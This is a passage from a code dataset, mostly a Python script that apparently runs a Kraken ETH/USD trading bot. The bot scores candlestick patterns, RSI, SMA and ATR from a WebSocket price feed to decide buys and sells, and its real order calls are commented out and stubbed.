time.sleep(1)\n","repo_name":"maple24/vta","sub_path":"scripts/autodownloader.py","file_name":"autodownloader.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29480036346","text":"########## For REST API ###########\r\nimport time\r\nfrom matplotlib.pyplot import close\r\nimport numpy as np\r\nimport urllib\r\nimport hashlib\r\nimport base64\r\nimport hmac\r\nimport requests\r\nimport numpy\r\n########## For REST API ###########\r\n\r\n########## For Trading Strategy ##########\r\nfrom scipy.signal import argrelextrema\r\nimport talib\r\n########## For Trading Strategy ##########\r\n\r\n########## From Other Scripts ##########\r\nimport config\r\nimport api_enum\r\nimport candlestick_id\r\nimport algo_func\r\n########## From Other Scripts ##########\r\n\r\n\r\n########## For WebSocket ###########\r\nimport websocket\r\nimport json\r\nimport datetime\r\n########## For WebSocket ###########\r\n\r\n\r\n########## For REST API ###########\r\n# Define the constants, which are the API URL, API key and API secret key\r\nAPI_URL = \"https://api.kraken.com\"\r\nAPI_KEY = config.API_KEY\r\nAPI_SECRET_KEY = config.PRIVATE_KEY\r\nTRADE_PAIR = \"ETHUSD\"\r\n########## For REST API ###########\r\n\r\n\r\n########## For WebSocket ###########\r\nSOCKET = 'wss://ws.kraken.com'\r\n########## For WebSocket ###########\r\n\r\n########## CONSTANTS ##########\r\n# For receiving pricing data\r\nclose_price_list = []\r\nopen_price_list = []\r\nhigh_price_list = []\r\nlow_price_list = []\r\ntemp_open_price = 1.0\r\ntemp_high_price = 1.0\r\ntemp_low_price = 1.0\r\ntemp_close_price = 1.0\r\n# For candlestick data\r\ncandle_382_list = [np.nan]\r\ncandle_engulfing_list = [np.nan]\r\ncandle_close_ab_list = [np.nan]\r\nnum_candlestick = -1\r\nCANDLE_382_IMP = 0.80\r\nCANDLE_ENGULFING_IMP = 0.80\r\nCANDLE_CLOSE_AB_IMP = 0.80\r\nCANDLE_PERIOD_FOR_TREND = 10 # To adjust how many of the past 
candlesticks are relevant\r\ncandle_endtime_old = 'reference_endtime' # Set a random number just to allow the candle endtime checking logic\r\n# For RSI\r\nRSI_PERIOD = 14\r\nRSI_PERIOD_FOR_TREND = 6\r\nRSI_OVERBOUGHT = 75\r\nRSI_OVERSOLD = 25\r\n# For determining price trend\r\nTREND_PERIOD = 40 # This should be relating to ATR or some sort instead of a constant\r\nprice_trend = [np.nan for i in range(TREND_PERIOD)]\r\nglobal_support_resistance = 1.0\r\nSMA_PERIOD = 10 # To adjust how many of the past closing price are relevant in calculating the MA\r\nPULLBACK_NUM = 8 # This identifies the number of pullback in a single trend\r\n# For Uptrend/Downtrend Index\r\nBUY_PRESSURE_INDEX_LIST = [np.nan for i in range(np.maximum((RSI_PERIOD_FOR_TREND+RSI_PERIOD), TREND_PERIOD))] # Based on candlestick pattern, RSI and trend\r\nSELL_PRESSURE_INDEX_LIST = [np.nan for i in range(np.maximum((RSI_PERIOD_FOR_TREND+RSI_PERIOD), TREND_PERIOD))] # Based on candlestick pattern, RSI and trend\r\nREVERSAL_INDEX_LIST = [np.nan for i in range(np.maximum((RSI_PERIOD_FOR_TREND+RSI_PERIOD), TREND_PERIOD))] # Based on BUY/SELL pressure index, support/resistance and crossover of real price & MA\r\nUPTREND_INDEX_LIST = [np.nan for i in range(np.maximum((RSI_PERIOD_FOR_TREND+RSI_PERIOD), TREND_PERIOD))]\r\nDOWNTREND_INDEX_LIST = [np.nan for i in range(np.maximum((RSI_PERIOD_FOR_TREND+RSI_PERIOD), TREND_PERIOD))]\r\nTREND_SCORE_THRESHOLD = 0.70\r\nUPTREND_PERIOD = 6\r\nDOWNTREND_PERIOD = 6\r\nspt_rst_time_id = 0\r\n# For Reversal Index\r\nABOVE_SMA = True # Initialsie the variable with a random boolean, this does not matter if it's True or False\r\nREVERSAL_PERIOD = 6\r\n# For Buy/Sell Processes\r\nBUY_SIGNAL = False\r\nSELL_SIGNAL = False\r\nMIN_PRICE = 50000.0\r\nMAX_PRICE = 1.0\r\nSOLD = 0.0\r\nBOUGHT = 0.0\r\nIN_POSITION = False\r\nIN_POSITION_2 = True\r\nBUY_LOWER_THRESHOLD = 0.00\r\nBUY_LOWER_MIDDLE_THRESHOLD = 3.50\r\nBUY_UPPER_MIDDLE_THRESHOLD = 9.0\r\nBUY_UPPER_THRESHOLD = 20.00\r\nSELL_LOWER_THRESHOLD = 0.00\r\nSELL_LOWER_MIDDLE_THRESHOLD = 3.80\r\nSELL_UPPER_MIDDLE_THRESHOLD = 9.0\r\nSELL_UPPER_THRESHOLD = 20.0\r\nSELL_SEC_UP_THRESHOLD = 11.0\r\nSELL_SEC_DOWN_THRESHOLD = 4.0\r\nSELL_SEC_REVERSAL_THRESHOLD = 0.5\r\nLOWER_DOWN_UP_DIFF = 3.50\r\nUPPER_DOWN_UP_DIFF = 20.00\r\nLOWER_UP_DOWN_DIFF = 3.50\r\nUPPER_UP_DOWN_DIFF = 20.00\r\nBUY_REVERSAL_UPPER_THRESHOLD = 2.40\r\nBUY_REVERSAL_LOWER_THRESHOLD = 0.50\r\nSELL_REVERSAL_UPPER_THRESHOLD = 2.00\r\nSELL_REVERSAL_LOWER_THRESHOLD = 0.50\r\nQUANTITY = 0.004\r\nBOUGHT_HIST = []\r\nBOUGHT_TIME = []\r\nSECOND_BOUGHT_TIME = []\r\nSOLD_HIST = []\r\nSOLD_TIME = []\r\nSECOND_SOLD_TIME = []\r\nFINAL_UPTREND_INDEX_LIST = []\r\nFINAL_DOWNTREND_INDEX_LIST = []\r\nFINAL_REVERSAL_INDEX_LIST = []\r\nBUY_SIGNAL_TIME = []\r\nSELL_SIGNAL_TIME = []\r\nKRAKEN_FEES = 0.290 / 100 # 0.579% of the sold quantity, 0.289% for each transaction (buy & sell)\r\nSTOP_LOSS_THRESHOLD = 30.0\r\nBOUGHT_PER_UNIT = 0.0\r\nBOUGHT_PER_UNIT_LIST = []\r\nSOLD_PER_UNIT = 0.0\r\nSOLD_PER_UNIT_LIST = []\r\nORDER_TIMES = 1\r\n########## CONSTANTS ##########\r\n\r\n\r\n########## For WebSocket ###########\r\ndef on_open(ws):\r\n print(\"Opened Connection\")\r\n # Send the data as string, NOTE: All msg sent and received via WebSockets are encoded in JSON format\r\n # json.dumps serialise object to a JSON formatted string\r\n ws.send(json.dumps(payload))\r\n\r\ndef on_close(ws):\r\n print(\"Closed Connection\")\r\n\r\ndef on_message(ws, message):\r\n global candle_endtime_old\r\n global IN_POSITION\r\n global 
temp_open_price\r\n global temp_high_price\r\n global temp_low_price\r\n global temp_close_price\r\n global num_candlestick\r\n global global_support_resistance\r\n global buy_pressure_index\r\n global sell_pressure_index\r\n global reversal_index\r\n global uptrend_index\r\n global downtrend_index\r\n global ABOVE_SMA\r\n global BOUGHT_PRICE\r\n global BUY_SIGNAL\r\n global SELL_SIGNAL\r\n global MIN_PRICE\r\n global MAX_PRICE\r\n global SOLD\r\n global SOLD_PER_UNIT\r\n global SOLD_PER_UNIT_LIST\r\n global BOUGHT\r\n global BOUGHT_PER_UNIT\r\n global BOUGHT_PER_UNIT_LIST\r\n global spt_rst_time_id\r\n\r\n buy_pressure_index = 0\r\n sell_pressure_index = 0\r\n reversal_index = 0\r\n uptrend_index = 0\r\n downtrend_index = 0\r\n\r\n # Deserialise the received data (in JSON format) to Python object\r\n loaded_msg = json.loads(message)\r\n\r\n # Note that the processed message sent to us will be in the type of list and dictionary\r\n # list for the message from the subscribed stream, dictionary for heartbeat (when there's no subscription traffic within 1 sec)\r\n if type(loaded_msg) == list:\r\n #print(\"Received Message\")\r\n #print(loaded_msg)\r\n\r\n # Check if the newly received message is an update of the same candle or an entire new candle of different timestamp\r\n # Append to the list whenever there is a new candlestick\r\n candle_endtime_now = loaded_msg[1][1] # output: str, candlestick endtime\r\n\r\n if candle_endtime_now != candle_endtime_old:\r\n # This is to isolate the very first message received where the prices could be still updating or already updated\r\n if num_candlestick == -1:\r\n candle_endtime_old = candle_endtime_now\r\n num_candlestick += 1\r\n print(\"Received the very first price but not sure if they are the finalised price or will still be updated\")\r\n else:\r\n # Append the previously stored (finalised) prices into the list\r\n open_price_list.append(temp_open_price) # For opening price, remain the same throughout the timeframe\r\n high_price_list.append(temp_high_price) # For highest price of the candlestick\r\n low_price_list.append(temp_low_price) # For lowest price of the candlestick\r\n close_price_list.append(temp_close_price) # For closing price\r\n candle_endtime_old = candle_endtime_now\r\n num_candlestick += 1\r\n timenow = datetime.datetime.now()\r\n print(timenow.strftime(\"Day: %Y-%m-%d Time: %H%M%S\"))\r\n #print(\"Different candlestick endtime, meaning the previous prices are finalised, appended the finalised price into the list\")\r\n #print(\"Candlestick Opening Price: {}\".format(open_price_list))\r\n #print(\"Candlestick High Price: {}\".format(high_price_list))\r\n #print(\"Candlestick Low Price: {}\".format(low_price_list))\r\n #print(\"Candlestick Closing Price: {}\".format(close_price_list))\r\n print(\"Number of Candlestick: {}\".format(len(close_price_list)))\r\n\r\n # Store a temporary variable of the price, only append to the list once the price is finalised\r\n temp_open_price = float(loaded_msg[1][2])\r\n temp_high_price = float(loaded_msg[1][3])\r\n temp_low_price = float(loaded_msg[1][4])\r\n temp_close_price = float(loaded_msg[1][5])\r\n\r\n # Detect the pattern of 38.2%, Engulfing and Close above/below candle\r\n # Will ignore the updating candlestick, only deal with the finalised one\r\n if len(close_price_list) > 1:\r\n is_candle_382 = candlestick_id.candle_382(open_price_list=open_price_list, high_price_list=high_price_list,\r\n low_price_list=low_price_list, close_price_list=close_price_list)\r\n 
candle_382_list.append(is_candle_382)\r\n #print(\"Candle 38.2% Pattern: {}\".format(candle_382_list))\r\n\r\n is_candle_engulfing = candlestick_id.candle_engulf(open_price_list=open_price_list,\r\n close_price_list=close_price_list)\r\n candle_engulfing_list.append(is_candle_engulfing) \r\n #print(\"Engulfing Candle Pattern: {}\".format(candle_engulfing_list)) \r\n\r\n is_candle_close = candlestick_id.candle_close_above_below(high_price_list=high_price_list,\r\n low_price_list=low_price_list,\r\n close_price_list=close_price_list)\r\n candle_close_ab_list.append(is_candle_close)\r\n #print(\"Close Above/Below Candle Pattern: {}\".format(candle_close_ab_list)) \r\n\r\n if len(close_price_list) > CANDLE_PERIOD_FOR_TREND:\r\n # Starts calculating for the number of times a certain candle pattern appears in the market\r\n # Output: (0.8, 0.4) --> 0.8 frequency of certain candlestick indicating the existence of buy pressure\r\n # 0.4 frequency of certain candlestick indicating the existence of sell pressure\r\n candle_382_score = np.array(algo_func.find_num_bool(list=candle_382_list, \r\n timeperiod=CANDLE_PERIOD_FOR_TREND)) * CANDLE_382_IMP\r\n print(\"Candle 38.2% Score: {}\".format(candle_382_score))\r\n candle_engulfing_score = np.array(algo_func.find_num_bool(list=candle_engulfing_list, \r\n timeperiod=CANDLE_PERIOD_FOR_TREND)) * CANDLE_ENGULFING_IMP\r\n print(\"Engulfing Candle Score: {}\".format(candle_engulfing_score))\r\n candle_close_ab_score = np.array(algo_func.find_num_bool(list=candle_close_ab_list, \r\n timeperiod=CANDLE_PERIOD_FOR_TREND)) * CANDLE_CLOSE_AB_IMP\r\n print(\"Close Above/Below Candle Score: {}\".format(candle_close_ab_score))\r\n\r\n # Sum up all the buy pressure and sell pressure score from the different type of candle\r\n buy_sell_array = np.round(np.sum([candle_382_score, candle_engulfing_score, candle_close_ab_score], axis=0), 2)\r\n print(\"candlestick Buy/Sell Score: {}\".format(buy_sell_array))\r\n buy_pressure_index += buy_sell_array[0]\r\n sell_pressure_index += buy_sell_array[1]\r\n\r\n # Detect whether the market is on an uptrend or downtrend\r\n if len(close_price_list) > TREND_PERIOD:\r\n uptrend_perc = trend_id(high_price_list=high_price_list, low_price_list=low_price_list, \r\n close_price_list=close_price_list, timeperiod=TREND_PERIOD, number=PULLBACK_NUM)\r\n price_trend.append(uptrend_perc[:2])\r\n #print(\"Trends recorded so far: {}\".format(price_trend))\r\n\r\n # Define the support or resistance\r\n is_support, support_resistance_value = uptrend_perc[-1]\r\n spt_rst_time_id = len(close_price_list)\r\n print(\"Support Detected at nth candlestick: {}\".format(spt_rst_time_id))\r\n print(\"Support: {}\".format(is_support))\r\n print(\"Support/Resistance Value: {}\".format(support_resistance_value[0]))\r\n \r\n # Context manager to avoid the current price be identified as a resistance/support\r\n # if (len(close_price_list) - spt_rst_time_id) > 15:\r\n # global_support_resistance =\r\n\r\n # if is_support == True:\r\n\r\n\r\n # NOTE: uptrend_perc[0] is boolean whether it is uptrend\r\n # NOTE: uptrend_perc[1] is the confidence score on the current trend\r\n # On version 4, remove the TREND_SCORE_THRESHOLDD, straight away use the uptrend_perc[1] as the score of down/up trend index\r\n if (uptrend_perc[0] == True):\r\n uptrend_index += uptrend_perc[1]\r\n print(\"Uptrend Score: +{}\".format(uptrend_perc[1]))\r\n elif (uptrend_perc[0] == False):\r\n downtrend_index += uptrend_perc[1]\r\n print(\"Downtrend Score: +{}\".format(uptrend_perc[1]))\r\n\r\n # 
Calculate Moving Average 20\r\n high_price_list_array = np.array(high_price_list).astype(np.float64)\r\n low_price_list_array = np.array(low_price_list).astype(np.float64)\r\n close_price_list_array = np.array(close_price_list).astype(np.float64)\r\n\r\n sma = talib.SMA(close_price_list_array, timeperiod=SMA_PERIOD)\r\n #print(\"SMA: {}\".format(sma))\r\n if len(REVERSAL_INDEX_LIST) == np.maximum((RSI_PERIOD_FOR_TREND + RSI_PERIOD), TREND_PERIOD):\r\n if sma[-1] > close_price_list[-1]:\r\n ABOVE_SMA = True\r\n print(\"Current Price is below SMA\")\r\n else:\r\n ABOVE_SMA = False\r\n print(\"Current Price is above SMA\")\r\n else:\r\n if sma[-1] > close_price_list[-1]:\r\n NEW_ABOVE_SMA = True\r\n print(\"Current price is below the latest SMA\")\r\n else:\r\n NEW_ABOVE_SMA = False\r\n print(\"Current price is above the latest SMA\")\r\n # There's a sign of reversal if there's a intersection between the MA and the closing price\r\n if NEW_ABOVE_SMA != ABOVE_SMA:\r\n reversal_index += 0.50\r\n print(\"Intersection of MA and closing price so Reversal Index: +0.50\")\r\n ABOVE_SMA = NEW_ABOVE_SMA\r\n print(\"There's a reversal of trend\")\r\n print(\"Current trend above SMA: {}\".format(NEW_ABOVE_SMA))\r\n else:\r\n print(\"There's no reversal of trend\")\r\n print(\"Current trend above SMA: {}\".format(NEW_ABOVE_SMA))\r\n\r\n # Calculate the Average True Range\r\n atr = talib.ATR(high=high_price_list_array, low=low_price_list_array, close=close_price_list_array, timeperiod=14)\r\n print(\"ATR calculated so far: {}\".format(atr))\r\n print(\"Current ATR: {}\".format(atr[-1]))\r\n\r\n # When there's at least number of closing price data, we starts calculating the RSI for it\r\n if len(close_price_list) > (RSI_PERIOD + RSI_PERIOD_FOR_TREND):\r\n np_close_price = np.array(close_price_list).astype(np.float64) # Convert to numpy as required by talib library\r\n rsi = talib.RSI(np_close_price, RSI_PERIOD)\r\n #print(\"RSI calculated so far: {}\".format(rsi))\r\n print(\"Current RSI: {}\".format(rsi[-1]))\r\n\r\n # Add points to the buy/sell pressure index when current RSI is greater/lower than the previous few RSI\r\n if rsi[-1] > rsi[-RSI_PERIOD_FOR_TREND]:\r\n buy_pressure_index += 0.1\r\n print(\"Current RSI is greater than previous RSI so Buy Pressure Index: +0.10\")\r\n else:\r\n sell_pressure_index += 0.1\r\n print(\"Current RSI is smaller than previous RSI so Sell Pressure Index: +0.10\")\r\n\r\n # Possbility of having reversal increases when there's oversold or overbought situation\r\n if (rsi[-1] > RSI_OVERBOUGHT) or (rsi[-1] < RSI_OVERSOLD):\r\n reversal_index += 0.2\r\n print(\"Overbought/Oversold so Reversal Index: +0.2\")\r\n\r\n \r\n \r\n ########## Combine all the indicators and strategy used here ###########\r\n if len(close_price_list) > np.maximum((RSI_PERIOD_FOR_TREND+RSI_PERIOD), TREND_PERIOD):\r\n print(\"Uptrend Index = Buy Pressure Index (RSI + Candle Pattern) + Uptrend Score\")\r\n print(\"Downtrend Index = Sell Pressure Index (RSI + Candle Pattern) + Downtrend Score\")\r\n BUY_PRESSURE_INDEX_LIST.append(buy_pressure_index)\r\n SELL_PRESSURE_INDEX_LIST.append(sell_pressure_index)\r\n #print(\"All Buy Pressure Index: {}\".format(BUY_PRESSURE_INDEX_LIST))\r\n #print(\"All Sell Pressure Index: {}\".format(SELL_PRESSURE_INDEX_LIST))\r\n # Uptrend index consists of the buy pressure index and the uptrend score itself\r\n uptrend_index += buy_pressure_index\r\n downtrend_index += sell_pressure_index\r\n UPTREND_INDEX_LIST.append(uptrend_index)\r\n 
DOWNTREND_INDEX_LIST.append(downtrend_index)\r\n\r\n # Add score to the reversal index when the difference between uptrend index and downtrend index are small\r\n if abs(UPTREND_INDEX_LIST[-1] - DOWNTREND_INDEX_LIST[-1]) <= 0.4:\r\n reversal_index += 0.40\r\n print(\"Small diff between uptrend and downtrend index, reversal index: +0.40\")\r\n\r\n\r\n #print(\"All Uptrend Index: {}\".format(UPTREND_INDEX_LIST))\r\n #print(\"All Downtrend Index: {}\".format(DOWNTREND_INDEX_LIST))\r\n REVERSAL_INDEX_LIST.append(reversal_index)\r\n #print(\"All Reversal Index: {}\".format(REVERSAL_INDEX_LIST))\r\n\r\n # Take the sum of the past e.g. 6 candlesticks reversal index as the final index, this could be greater than one\r\n final_reversal_index = np.sum(np.array(REVERSAL_INDEX_LIST[-REVERSAL_PERIOD:]))\r\n print(\"Final Reversal Index for the last {} candlestick: {}\".format(REVERSAL_PERIOD, final_reversal_index))\r\n # The same for uptrend index and downtrend index\r\n final_uptrend_index = np.sum(np.array(UPTREND_INDEX_LIST[-UPTREND_PERIOD:]))\r\n final_downtrend_index = np.sum(np.array(DOWNTREND_INDEX_LIST[-DOWNTREND_PERIOD:]))\r\n\r\n print(\"Final uptrend index for the last {} candlestick: {}\".format(UPTREND_PERIOD, final_uptrend_index))\r\n print(\"Final downtrend index for the last {} candlestick: {}\".format(DOWNTREND_PERIOD, final_downtrend_index))\r\n\r\n if IN_POSITION == True:\r\n print(\"In position...\")\r\n \r\n # Stop loss backup plan\r\n if ((BOUGHT_PER_UNIT - close_price_list[-1]) > STOP_LOSS_THRESHOLD):\r\n print(\"The price keeps falling..sell now to stop losses\")\r\n SOLD_PER_UNIT = close_price_list[-1]\r\n SOLD_PER_UNIT_LIST.append(SOLD_PER_UNIT)\r\n SOLD = QUANTITY * close_price_list[-1]\r\n for i in range(ORDER_TIMES):\r\n # resp_sold = kraken_request(url_path=api_enum.USER_TRADING['ADD_ORDER'], \r\n # data={\r\n # \"nonce\": nonce_generator(),\r\n # \"ordertype\": \"market\",\r\n # \"type\": \"sell\",\r\n # \"volume\": QUANTITY,\r\n # \"pair\": TRADE_PAIR,\r\n # }, \r\n # api_key=API_KEY,\r\n # api_sec=API_SECRET_KEY)\r\n # resp_sold = resp_sold.json()\r\n resp_sold = {'error': []}\r\n\r\n # Check if the response returns any error\r\n if resp_sold['error'] == []:\r\n print(\"ORDER SUCCEED\")\r\n #print(\"Response: {}\".format(resp_sold['result']))\r\n print(\"Sold {} USD at {} per ETH\".format(SOLD, close_price_list[-1]))\r\n print(\"Sold {} USD at {} per ETH\".format(SOLD, SOLD_PER_UNIT))\r\n IN_POSITION = False\r\n SELL_SIGNAL = False\r\n SOLD_HIST.append(SOLD)\r\n SOLD_TIME.append((timenow.strftime(\"%Y%m%d_%H%M%S\"), \"SL\"))\r\n else:\r\n print(\"ORDER FAILED\")\r\n print(\"Error: {}\".format(resp_sold['error']))\r\n\r\n else:\r\n print(\"The current price is still above the stop-loss price..Proceed as usual\")\r\n\r\n if SELL_SIGNAL == False:\r\n # Sell when uptrend/downtrend index indicating an uptrend and the reversal index is high\r\n if (final_uptrend_index >= SELL_UPPER_MIDDLE_THRESHOLD) and (final_uptrend_index <= SELL_UPPER_THRESHOLD) and (final_downtrend_index >= SELL_LOWER_THRESHOLD) and (final_downtrend_index <= SELL_LOWER_MIDDLE_THRESHOLD) and ((final_uptrend_index - final_downtrend_index) >= LOWER_UP_DOWN_DIFF) and ((final_uptrend_index - final_downtrend_index) <= UPPER_UP_DOWN_DIFF):\r\n print(\"FUI, {} in between {} and {} ----- FDI, {} in between {} and {}\".format(final_uptrend_index, SELL_UPPER_MIDDLE_THRESHOLD, SELL_UPPER_THRESHOLD,\r\n final_downtrend_index, SELL_LOWER_THRESHOLD, SELL_LOWER_MIDDLE_THRESHOLD))\r\n print(\"Final uptrend index - Final 
downtrend index, {} in between {} and {}\".format((final_uptrend_index-final_downtrend_index), LOWER_UP_DOWN_DIFF, UPPER_UP_DOWN_DIFF))\r\n if (final_reversal_index >= SELL_REVERSAL_LOWER_THRESHOLD) and (final_reversal_index <= SELL_REVERSAL_UPPER_THRESHOLD):\r\n print(\"Final Reversal Index, {} in between {} and {}\".format(final_reversal_index, SELL_REVERSAL_LOWER_THRESHOLD, SELL_REVERSAL_UPPER_THRESHOLD))\r\n print(\"Sell signal is switched on now\")\r\n SELL_SIGNAL = True\r\n SELL_SIGNAL_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n MAX_PRICE = close_price_list[-1]\r\n\r\n else:\r\n print(\"Final Reversal Index, {} NOT in between {} and {}\".format(final_reversal_index, SELL_REVERSAL_LOWER_THRESHOLD, SELL_REVERSAL_UPPER_THRESHOLD))\r\n print(\"Reversal Condition not met...\")\r\n else:\r\n print(\"Final uptrend index and/or Final downtrend index not met requirement\")\r\n print(\"Check on second set of selling conditions...FUI >= 11.0, FDI <= 4.0, FRI >= 0.5\")\r\n \r\n if (final_uptrend_index >= SELL_SEC_UP_THRESHOLD) and (final_downtrend_index <= SELL_SEC_DOWN_THRESHOLD) and (final_reversal_index >= SELL_SEC_REVERSAL_THRESHOLD):\r\n print(\"Second set of selling conditions are satisfied\")\r\n print(\"Final uptrend index, {} > {} ----- Final downtrend index, {} < {} ----- Final reversal index, {} > {}\".format(final_uptrend_index, SELL_SEC_UP_THRESHOLD, final_downtrend_index, SELL_SEC_DOWN_THRESHOLD, final_reversal_index, SELL_SEC_REVERSAL_THRESHOLD))\r\n print(\"Sell since we already in position and it is a good time to sell\")\r\n print(\"Condition satisfied:\")\r\n\r\n SOLD = QUANTITY * close_price_list[-1]\r\n\r\n if (SOLD - BOUGHT) > 0.0:\r\n print(\"Selling price is greater than the bought price...can proceed\")\r\n print(\"Must have at least {} USD of return to have net profit\".format((SOLD*KRAKEN_FEES) + (BOUGHT*KRAKEN_FEES)))\r\n print(\"Current Return: {}\".format((SOLD - BOUGHT)))\r\n\r\n if (SOLD - BOUGHT) > ((SOLD * KRAKEN_FEES) + (BOUGHT * KRAKEN_FEES)):\r\n print(\"Selling price yields profit even after deducting the trading fees\")\r\n\r\n print(\"Making Sell Order\")\r\n for i in range(ORDER_TIMES):\r\n # resp_sold = kraken_request(url_path=api_enum.USER_TRADING['ADD_ORDER'], \r\n # data={\r\n # \"nonce\": nonce_generator(),\r\n # \"ordertype\": \"market\",\r\n # \"type\": \"sell\",\r\n # \"volume\": QUANTITY,\r\n # \"pair\": TRADE_PAIR,\r\n # }, \r\n # api_key=API_KEY,\r\n # api_sec=API_SECRET_KEY)\r\n # resp_sold = resp_sold.json()\r\n resp_sold = {'error': []}\r\n # Check if the response returns any error\r\n if resp_sold['error'] == []:\r\n print(\"ORDER SUCCEED\")\r\n #print(\"Response: {}\".format(resp_sold['result']))\r\n print(\"Sold {} USD at {} per ETH\".format(SOLD, close_price_list[-1]))\r\n SOLD_HIST.append(SOLD)\r\n SOLD_PER_UNIT = close_price_list[-1]\r\n SOLD_PER_UNIT_LIST.append(SOLD_PER_UNIT)\r\n SOLD_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n SECOND_SOLD_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n IN_POSITION = False\r\n FINAL_UPTREND_INDEX_LIST.append(final_uptrend_index)\r\n FINAL_DOWNTREND_INDEX_LIST.append(final_downtrend_index)\r\n FINAL_REVERSAL_INDEX_LIST.append(final_reversal_index)\r\n else:\r\n print(\"ORDER FAILED\")\r\n print(\"Error: {}\".format(resp_sold['error']))\r\n\r\n else:\r\n print(\"Selling price does not yield profit after deducting trading fees..Will not sell now\")\r\n\r\n else:\r\n print(\"Won't sell yet as the current price is lower than bought price although condition satisfied\")\r\n \r\n 
else:\r\n print(\"Second set of selling condition not met...Will not sell...\")\r\n\r\n elif SELL_SIGNAL == True:\r\n print(\"Sell signal is up..Will sell once the prices starts falling\")\r\n\r\n MAX_PRICE = close_price_list[-1] if close_price_list[-1] > MAX_PRICE else MAX_PRICE\r\n print(\"Maximum price: {}\".format(MAX_PRICE))\r\n print(\"Current price: {}\".format(close_price_list[-1]))\r\n print(\"Last atr: {}\".format(atr[-1]))\r\n print(\"Price difference: {}\".format(MAX_PRICE - close_price_list[-1]))\r\n\r\n if ((MAX_PRICE - close_price_list[-1]) < atr[-1]):\r\n print(\"Hold first since the price is still rising\")\r\n print(\"Price diff is smaller than atr\")\r\n else:\r\n print(\"Price diff is greater than atr\")\r\n print(\"Prices are decreasing significantly..Sell now\")\r\n # Only sell when we have profit\r\n #BOUGHT_PRICE = close_price_list[-1]\r\n print(\"Sell since we already in position and it is a good time to sell\")\r\n print(\"Condition satisfied:\")\r\n\r\n SOLD = QUANTITY * close_price_list[-1]\r\n \r\n if (SOLD - BOUGHT) > 0.0:\r\n print(\"Selling price is greater than the bought price...can proceed\")\r\n print(\"Must have at least {} USD of return to have net profit\".format((SOLD*KRAKEN_FEES) + (BOUGHT*KRAKEN_FEES)))\r\n print(\"Current Return (USD): {}\".format((SOLD - BOUGHT)))\r\n\r\n # Sell when there's profit even after deducting the kraken transaction fees\r\n if (SOLD - BOUGHT) > ((SOLD * KRAKEN_FEES) + (BOUGHT * KRAKEN_FEES)):\r\n print(\"Selling price yields profit even after deducting the trading fees\")\r\n print(\"Bought Price: {}\".format(BOUGHT))\r\n print(\"Current price is greater than the bought price..Can sell\")\r\n\r\n print(\"Making Sell Order\")\r\n for i in range(ORDER_TIMES):\r\n print(\"Order {}:\".format(i))\r\n # resp_sold = kraken_request(url_path=api_enum.USER_TRADING['ADD_ORDER'], \r\n # data={\r\n # \"nonce\": nonce_generator(),\r\n # \"ordertype\": \"market\",\r\n # \"type\": \"sell\",\r\n # \"volume\": QUANTITY,\r\n # \"pair\": TRADE_PAIR,\r\n # }, \r\n # api_key=API_KEY,\r\n # api_sec=API_SECRET_KEY)\r\n # resp_sold = resp_sold.json()\r\n resp_sold = {'error': []}\r\n # Check if the response returns any error\r\n if resp_sold['error'] == []:\r\n print(\"ORDER SUCCEED\")\r\n #print(\"Response: {}\".format(resp_sold['result']))\r\n SOLD_PER_UNIT = close_price_list[-1]\r\n SOLD_PER_UNIT_LIST.append(SOLD_PER_UNIT)\r\n print(\"Sold {} USD at {} per ETH\".format(SOLD, SOLD_PER_UNIT))\r\n SOLD_HIST.append(SOLD)\r\n SOLD_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n IN_POSITION = False\r\n FINAL_UPTREND_INDEX_LIST.append(final_uptrend_index)\r\n FINAL_DOWNTREND_INDEX_LIST.append(final_downtrend_index)\r\n FINAL_REVERSAL_INDEX_LIST.append(final_reversal_index)\r\n SELL_SIGNAL = False\r\n\r\n else:\r\n print(\"ORDER FAILED\")\r\n print(\"Error: {}\".format(resp_sold['error']))\r\n\r\n else:\r\n print(\"Selling price does not yield profit after deducting trading fees\")\r\n print(\"Will not sell for now...\")\r\n else:\r\n print(\"Won't sell yet as the current price is lower than bought price although condition satisfied\")\r\n print(\"Will monitor the price, if drops below the stop-loss price, will sell immediately\")\r\n \r\n\r\n\r\n elif IN_POSITION == False:\r\n print(\"Not in position...\")\r\n\r\n if BUY_SIGNAL == False:\r\n # Check if the average true range is above average true range upper threshold, if yes then don't buy first\r\n if (atr[-1] > 4.00):\r\n print(\"ATR is above 4.00, dont buy yet\")\r\n else:\r\n print(\"ATR 
is not greater than 4.00 or FDI < FUI, will buy if condition satisfied\")\r\n if (final_downtrend_index >= BUY_UPPER_MIDDLE_THRESHOLD) and (final_downtrend_index <= BUY_UPPER_THRESHOLD) and (final_uptrend_index >= BUY_LOWER_THRESHOLD) and (final_uptrend_index <= BUY_LOWER_MIDDLE_THRESHOLD) and ((final_downtrend_index - final_uptrend_index) >= LOWER_DOWN_UP_DIFF) and ((final_downtrend_index - final_uptrend_index) <= UPPER_DOWN_UP_DIFF):\r\n print(\"FDI, {} in between {} and {} ----- FUI, {} in between {} and {}\".format(final_downtrend_index, BUY_UPPER_MIDDLE_THRESHOLD, BUY_UPPER_THRESHOLD,\r\n final_uptrend_index, BUY_LOWER_THRESHOLD, BUY_LOWER_MIDDLE_THRESHOLD))\r\n print(\"Final downtrend index - Final uptrend index, {} in between {} and {}\".format((final_downtrend_index-final_uptrend_index), LOWER_DOWN_UP_DIFF, UPPER_DOWN_UP_DIFF))\r\n if (final_reversal_index >= BUY_REVERSAL_LOWER_THRESHOLD) and (final_reversal_index <= BUY_REVERSAL_UPPER_THRESHOLD):\r\n print(\"Final Reversal Index, {} in between {} and {}\".format(final_reversal_index, BUY_REVERSAL_LOWER_THRESHOLD, BUY_REVERSAL_UPPER_THRESHOLD))\r\n print(\"Buy signal is switched on now\")\r\n BUY_SIGNAL = True\r\n BUY_SIGNAL_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n MIN_PRICE = close_price_list[-1]\r\n\r\n else:\r\n print(\"Final Reversal Index, {} NOT in between {} and {}\".format(final_reversal_index, BUY_REVERSAL_LOWER_THRESHOLD, BUY_REVERSAL_UPPER_THRESHOLD))\r\n print(\"Reversal Condition not met...\")\r\n else:\r\n print(\"Final uptrend index and/or Final downtrend index not met 